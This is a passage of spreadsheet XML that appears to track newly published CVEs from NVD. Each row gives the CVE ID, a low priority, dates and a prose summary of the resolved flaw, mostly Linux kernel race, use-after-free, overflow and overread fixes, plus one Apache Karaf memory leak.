          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q796" s="5" t="inlineStr"/>
      <c r="R796" s="5" t="inlineStr"/>
      <c r="S796" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Don't run the error ISR before probe sets up vintfs
__tegra241_cmdqv_probe() requests the error IRQ before it has allocated the
cmdqv-&gt;vintfs array and set cmdqv-&gt;num_vintfs. A CMDQV left enabled with a
latched error across a kexec fires the IRQ as soon as it is requested, and
tegra241_cmdqv_isr() then walks the uninitialized cmdqv-&gt;vintfs array.
Request the IRQ only after cmdqv-&gt;vintfs is allocated and zeroed, so that
a latched interrupt firing early runs the ISR against a valid array of NULL
slots that it safely skips.</t>
        </is>
      </c>
      <c r="T796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90428</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90429</t>
        </is>
      </c>
      <c r="D797" s="5" t="inlineStr"/>
      <c r="E797" s="5" t="inlineStr"/>
      <c r="F797" s="5" t="inlineStr"/>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="inlineStr"/>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q797" s="5" t="inlineStr"/>
      <c r="R797" s="5" t="inlineStr"/>
      <c r="S797" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Synchronize the error ISR against VINTF (de)init
A user VINTF is torn down by tegra241_cmdqv_deinit_vintf(), which runs from
the destroy callback and from the init-failure unwind in the alloc handler.
It clears the cmdqv-&gt;vintfs[] slot and lets the iommufd core free it, but
nothing serializes that against the error interrupt: tegra241_cmdqv_isr()
reads cmdqv-&gt;vintfs[idx] and dereferences the vintf. A concurrent error can
make the ISR read a slot mid-clear (a NULL deref) or use a vintf which is
about to be freed (a use-after-free).
deinit_vintf() also returns idx to the IDA before clearing the slot, so a
concurrent create that reuses idx can publish its new vintf into the slot,
only for this teardown to erase it again with the stale NULL store.
On the other end, tegra241_cmdqv_init_vintf() publishes a new vintf with a
plain store to the cmdqv-&gt;vintfs[] slot, and the ISR dereferences fields of
a published vintf such as vintf-&gt;base. A plain store gives no ordering on a
weakly-ordered CPU, and a stale VINTF_ERR_MAP bit on a reused idx can make
the ISR pick a vintf the moment it is published, before its fields are set
or tegra241_vintf_hw_init() runs.
The cmdqv-&gt;vintfs[0] slot stays NULL until tegra241_cmdqv_init_structures()
first creates VINTF0, so the slot 0 read needs the same NULL check.
Publish every slot with an smp_store_release(), and read each slot in the
ISR with an smp_load_acquire() under a NULL check, so the ISR always sees
a fully built vintf or NULL. Also make deinit_vintf() clear the slot, and
synchronize_irq() prior to returning idx to the IDA, so no vintf is freed
under a running handler and no reused idx is clobbered.</t>
        </is>
      </c>
      <c r="T797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90429</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90430</t>
        </is>
      </c>
      <c r="D798" s="5" t="inlineStr"/>
      <c r="E798" s="5" t="inlineStr"/>
      <c r="F798" s="5" t="inlineStr"/>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="inlineStr"/>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr"/>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q798" s="5" t="inlineStr"/>
      <c r="R798" s="5" t="inlineStr"/>
      <c r="S798" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Publish an LVCMDQ only after it is fully initialized
tegra241_vintf_init_lvcmdq() stores the freshly allocated vcmdq pointer to
the vintf-&gt;lvcmdqs[] array, before tegra241_vcmdq_alloc_smmu_cmdq() builds
the vcmdq-&gt;cmdq. The error ISR dereferences that cmdq, so a latched LVCMDQ
error (e.g. one inherited across a kexec) firing in this window would make
tegra241_vintf0_handle_error() pass the still-zeroed arm_smmu_cmdq down to
__arm_smmu_cmdq_skip_err(), dereferencing NULL queue register pointers.
Drop the store from tegra241_vintf_init_lvcmdq() and publish the vcmdq at
the end of the allocation instead, with an smp_store_release() that pairs
with an smp_load_acquire() in the ISR, which can see a fully built LVCMDQ
or NULL.
The user-owned LVCMDQ allocation moves accordingly, publishing the vcmdq
once tegra241_vcmdq_hw_init_user() succeeds, using a plain store since a
user VINTF's lvcmdqs[] has no lockless reader -- the error ISR only walks
the VINTF0 array.</t>
        </is>
      </c>
      <c r="T798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90430</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90431</t>
        </is>
      </c>
      <c r="D799" s="5" t="inlineStr"/>
      <c r="E799" s="5" t="inlineStr"/>
      <c r="F799" s="5" t="inlineStr"/>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="inlineStr"/>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q799" s="5" t="inlineStr"/>
      <c r="R799" s="5" t="inlineStr"/>
      <c r="S799" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
remoteproc: Prevent crash handling to race with rproc_del()
There's no synchronization between rproc_crash_handler_work() and
rproc_del(), as such it's possible for a driver to be removed while
crash-handler work is scheduled, or even executing - resulting in
use-after-free issues.
To avoid this the scheduled work need to be cancelled and synchronized
against before the removal proceeds.
In order to ensure that this doesn't race with the reporting, and
thereby scheduling new work, a "deleting" flag is introduced. This is
similar to the RPROC_DELETE state that was introduced to ensure that
"start" didn't race with rproc_del(), but the existing mechanism can not
be used as it's valid to call rproc_report_crash() in atomic context -
and the "state" is protected by a mutex.
In the event that work is cancelled the pm_stay_awake() is left
unbalanced and need to be unrolled.
The blocking and cancelling of crash-handler work prior to the actual
rproc_shutdown() call does have the explicit side-effect that crashes
resulting from the shutdown process will not enter the crash-handling
path, and as such will not generate devcoredumps etc. Due to the
existing mutual exclusion between these code paths there's no concrete
reduction in functionality, but further work would be needed to handle
this case.</t>
        </is>
      </c>
      <c r="T799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90431</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90432</t>
        </is>
      </c>
      <c r="D800" s="5" t="inlineStr"/>
      <c r="E800" s="5" t="inlineStr"/>
      <c r="F800" s="5" t="inlineStr"/>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="inlineStr"/>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr"/>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q800" s="5" t="inlineStr"/>
      <c r="R800" s="5" t="inlineStr"/>
      <c r="S800" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched_ext: Abort directly from the hardlockup handler
scx_hardlockup() defers the abort to an irq_work because exit claiming used
to take scx_sched_lock and couldn't run from NMI. The deferral is now
unnecessary - claiming is NMI-safe and asserting -&gt;aborting is exactly what
breaks the live-locks that hard-lock CPUs. Call handle_lockup() directly and
drop the irq_work. This also makes the self-detected case recoverable: the
perf watchdog fires on the hard-locked CPU itself, where a queued irq_work
never runs with IRQs off.
Also fix the return value: %true used to be returned whenever sched_ext was
loaded, suppressing the kernel's hardlockup report even when the abort was
refused. Return %true only when this call initiated the abort.</t>
        </is>
      </c>
      <c r="T800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90432</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90433</t>
        </is>
      </c>
      <c r="D801" s="5" t="inlineStr"/>
      <c r="E801" s="5" t="inlineStr"/>
      <c r="F801" s="5" t="inlineStr"/>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="inlineStr"/>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr"/>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q801" s="5" t="inlineStr"/>
      <c r="R801" s="5" t="inlineStr"/>
      <c r="S801" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
spi: oc-tiny: switch to managed controller allocation
The controller is allocated with the non-managed spi_alloc_host() while
the interrupt is registered with devm_request_irq().  During removal,
spi_bitbang_stop() only unregisters the controller; the subsequent
spi_controller_put() then frees the controller together with its
embedded driver-private devdata, which is the IRQ handler's dev_id.  The
devm_request_irq() release action (free_irq()), which drains the
handler, does not run until after .remove() returns.  A late or latched
interrupt can therefore reach tiny_spi_irq() and dereference
already-freed memory (e.g. hw-&gt;base).
Switch to devm_spi_alloc_host() so that the devres LIFO order releases
the controller only after free_irq() has drained the handler, and drop
the now-redundant spi_controller_put() from .remove().  The probe error
path is simplified to direct returns.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90433</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90434</t>
        </is>
      </c>
      <c r="D802" s="5" t="inlineStr"/>
      <c r="E802" s="5" t="inlineStr"/>
      <c r="F802" s="5" t="inlineStr"/>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="inlineStr"/>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q802" s="5" t="inlineStr"/>
      <c r="R802" s="5" t="inlineStr"/>
      <c r="S802" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
isofs: release zisofs block pointer buffer head
zisofs_fill_pages() reads the compressed block pointer table.  The error
paths release the current buffer_head, the loop also releases the old
buffer_head when it advances. However, the success path leaves the last
buffer_head referenced. Release it before returning success.</t>
        </is>
      </c>
      <c r="T802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90434</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90435</t>
        </is>
      </c>
      <c r="D803" s="5" t="inlineStr"/>
      <c r="E803" s="5" t="inlineStr"/>
      <c r="F803" s="5" t="inlineStr"/>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="inlineStr"/>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr"/>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q803" s="5" t="inlineStr"/>
      <c r="R803" s="5" t="inlineStr"/>
      <c r="S803" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mlx5: Fix integer overflow of user QP buffer size
set_user_buf_size() computes the QP buffer size by left-shifting the
user-supplied rq.wqe_cnt and rq.wqe_shift values as signed integers.
A sufficiently large rq.wqe_cnt causes signed integer overflow, which
is undefined behavior, and yields a small or negative buf_size, causing
ib_umem_get() to map a buffer smaller than the hardware will actually
write into.
Replace the shifts and addition with check_shl_overflow() and
check_add_overflow(), rejecting invalid user inputs.
Moreover, guard the identical shift computing qp-&gt;sq.offset in
_create_user_qp() before set_user_buf_size() is reached.</t>
        </is>
      </c>
      <c r="T803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90435</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92230</t>
        </is>
      </c>
      <c r="D804" s="5" t="inlineStr"/>
      <c r="E804" s="5" t="inlineStr"/>
      <c r="F804" s="5" t="inlineStr"/>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="inlineStr"/>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr"/>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q804" s="5" t="inlineStr"/>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="S804" s="5" t="inlineStr">
        <is>
          <t>Apache Karaf's XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader's pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance.</t>
        </is>
      </c>
      <c r="T804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92230</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92476</t>
        </is>
      </c>
      <c r="D805" s="5" t="inlineStr"/>
      <c r="E805" s="5" t="inlineStr"/>
      <c r="F805" s="5" t="inlineStr"/>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="inlineStr"/>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr"/>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q805" s="5" t="inlineStr"/>
      <c r="R805" s="5" t="inlineStr"/>
      <c r="S805" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: keembay - Initialize completion before requesting IRQ
kmb_ocs_aes_probe() requests the device IRQ before initializing
irq_completion. Once the handler is registered it can run immediately,
and ocs_aes_irq_handler() unconditionally calls complete(). An
interrupt in this window would therefore use an uninitialized
completion.
Initialize the completion before requesting the IRQ, as the sibling
OCS HCU and ECC drivers already do.</t>
        </is>
      </c>
      <c r="T805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92476</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92477</t>
        </is>
      </c>
      <c r="D806" s="5" t="inlineStr"/>
      <c r="E806" s="5" t="inlineStr"/>
      <c r="F806" s="5" t="inlineStr"/>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="inlineStr"/>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr"/>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q806" s="5" t="inlineStr"/>
      <c r="R806" s="5" t="inlineStr"/>
      <c r="S806" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: debugfs: Reserve space for a string terminator
ufs_saved_err_write() copies user input into a zero-initialized stack
buffer and passes it to kstrtoint(). A write that fills the entire buffer
overwrites its only terminator.
Reject an input whose length leaves no room for the trailing NUL.</t>
        </is>
      </c>
      <c r="T806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92477</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92478</t>
        </is>
      </c>
      <c r="D807" s="5" t="inlineStr"/>
      <c r="E807" s="5" t="inlineStr"/>
      <c r="F807" s="5" t="inlineStr"/>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="inlineStr"/>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q807" s="5" t="inlineStr"/>
      <c r="R807" s="5" t="inlineStr"/>
      <c r="S807" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Validate connected lane counts
The connected lane count is used by TX equalization code to index arrays
sized by UFS_MAX_LANES. Reject zero and out-of-range RX or TX lane counts
before they can be propagated.</t>
        </is>
      </c>
      <c r="T807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92478</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92479</t>
        </is>
      </c>
      <c r="D808" s="5" t="inlineStr"/>
      <c r="E808" s="5" t="inlineStr"/>
      <c r="F808" s="5" t="inlineStr"/>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="inlineStr"/>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q808" s="5" t="inlineStr"/>
      <c r="R808" s="5" t="inlineStr"/>
      <c r="S808" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: Avoid NULL CQE dereference when reporting invalid tags
The single-doorbell completion path can call ufshcd_compl_one_cqe() with a
NULL CQE. If no command is associated with the completion tag, the warning
message dereferences the CQE while reporting the error.  Avoid that
dereference and include the invalid tag in the warning.</t>
        </is>
      </c>
      <c r="T808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92479</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92480</t>
        </is>
      </c>
      <c r="D809" s="5" t="inlineStr"/>
      <c r="E809" s="5" t="inlineStr"/>
      <c r="F809" s="5" t="inlineStr"/>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="inlineStr"/>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr"/>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q809" s="5" t="inlineStr"/>
      <c r="R809" s="5" t="inlineStr"/>
      <c r="S809" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Validate string descriptors
The string descriptor length includes a two-byte header while the UTF-16
payload starts after it. utf16s_to_utf8s() expects a count of UTF-16 code
units, not bytes. Passing the payload byte count can make it read beyond
the descriptor buffer.
Validate that the payload has an even byte count, pass a code-unit count to
the converter, and allocate sufficient UTF-8 output space.
The raw string buffer starts after the descriptor header but its size is
bLength. Copying bLength bytes from that pointer can read beyond the
response buffer.
Allocate a zeroed bLength-sized buffer and copy only the UTF-16
payload. This preserves the raw buffer size consumed by the RPMB device-ID
ABI while avoiding the overread.</t>
        </is>
      </c>
      <c r="T809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92480</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92481</t>
        </is>
      </c>
      <c r="D810" s="5" t="inlineStr"/>
      <c r="E810" s="5" t="inlineStr"/>
      <c r="F810" s="5" t="inlineStr"/>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="inlineStr"/>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr"/>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q810" s="5" t="inlineStr"/>
      <c r="R810" s="5" t="inlineStr"/>
      <c r="S810" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: mediatek: free EINT resources on unbind
mtk_eint_do_init() creates an IRQ domain, populates it with a mapping for
every EINT line and installs a chained handler on the parent interrupt,
but none of these are ever released. This was harmless while the drivers
were built-in, but now that they can be built as modules and
unbound/rmmod'd it leaves behind a dangling IRQ domain, interrupt mappings
whose chip data points at freed memory, and a chained handler that keeps
firing into that freed data.
The plain allocations in mtk_eint_do_init() already use the device-managed
devm_*() helpers, so tear the remaining resources down the same way:
register a devm action that detaches the chained handler, waits for any
in-flight handler to finish, disposes of the per-line mappings and removes
the IRQ domain. This mirrors the device-managed lifecycle adopted for the
GPIO chip and keeps the whole EINT setup self-cleaning on unbind.</t>
        </is>
      </c>
      <c r="T810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92481</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92482</t>
        </is>
      </c>
      <c r="D811" s="5" t="inlineStr"/>
      <c r="E811" s="5" t="inlineStr"/>
      <c r="F811" s="5" t="inlineStr"/>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="inlineStr"/>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr"/>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
